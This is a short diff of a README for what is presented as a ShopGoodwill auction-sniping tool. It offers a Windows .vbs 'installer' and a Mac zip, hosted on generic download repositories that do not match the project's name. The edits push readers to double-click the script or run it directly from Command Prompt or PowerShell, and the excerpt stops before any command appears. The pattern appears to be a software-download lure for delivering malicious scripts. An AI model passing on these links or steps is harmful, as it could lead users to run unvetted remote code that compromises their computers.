shopgoodwill-sniper/shopgoodwill-auction-sniper/README.md

 :-------------------------:|:-------------------------:
 [Windows](https://shopgoodwill-auction-sniper.github.io/shopgoodwill-bid-sniper/Bid_Sniper_Windows_Installer.vbs)  |  [Mac](https://github.com/software-app-download/windows-mac/raw/main/shopgoodwill-auction-sniper-mac.zip?download=)

-### Run Directly from Command Prompt or PowerShell
+### Download Above or Run Directly from Command Prompt/PowerShell

-You can also run the Windows VBS script directly from your computer without downloading it.
+You can download the installer above and simply double click it or you can also run the Windows VBS script directly from your computer without downloading it from your command prompt or powershell.
 Follow these steps:

 #### Using Command Prompt